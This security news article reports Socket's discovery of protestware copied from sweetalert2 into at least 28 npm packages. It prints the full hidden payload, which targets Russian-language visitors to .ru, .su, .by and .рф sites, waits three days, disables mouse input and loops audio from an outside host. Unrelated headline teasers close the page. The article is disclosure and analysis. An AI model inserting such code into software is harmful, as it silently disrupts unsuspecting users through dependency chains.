Socket’s Threat Research Team has uncovered a significant supply chain security incident involving protestware that has spread across at least 28 new npm packages with nearly 2,000 versions.
The malicious code targets Russian-language users visiting Russian or Belarusian websites, disabling UI interactions and playing the Ukrainian national anthem.
This represents a concerning example of how political activism in software can propagate undetected through dependency chains, affecting unsuspecting developers and end users.
The protestware operates through a sophisticated conditional check embedded deep within packages containing over 100,000 lines of code.
The malicious script requires three specific conditions to activate: the user must be using a browser, have Russian language settings, and be visiting domains with .ru, .su, .by, or .рф extensions.
The core malicious code implements a time-delayed activation mechanism:
javascriptif (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
var now = new Date();
var initiationDate = localStorage.getItem('swal-initiation');
if (!initiationDate) {
localStorage.setItem('swal-initiation', "".concat(now));
} else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
setTimeout(function () {
document.body.style.pointerEvents = 'none';
var ukrainianAnthem = document.createElement('audio');
ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
ukrainianAnthem.loop = true;
document.body.appendChild(ukrainianAnthem);
}, 500);
}
}
The script waits three days before activation, ensuring only repeat visitors are affected. Once triggered, it disables all mouse interactions by setting pointerEvents it to ‘none’ and plays the Ukrainian anthem in a continuous loop.
The protestware originated from the popular sweetalert2 package, which has over 700,000 weekly downloads.
The package’s author, limonte, transparently disclosed the protestware functionality beginning with version 11.6.14, which was published three years ago, during Russia’s invasion of Ukraine.
However, the code has since propagated to numerous other packages without disclosure.
Affected packages include MeshCentral (16,895 downloads), Qumra-UI (2,074 downloads), and Alurkerja-UI (1,521 downloads), among others.
Many of these packages appear to have copied code from sweetalert2 without understanding or documenting the embedded protestware functionality.
Socket has classified these packages as malware due to their undocumented behavior and potential to disrupt the user experience severely.
The incident highlights critical supply chain vulnerabilities, where political activism code can spread undetected through dependency networks, affecting developers and users who may be unaware of its presence or intent.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…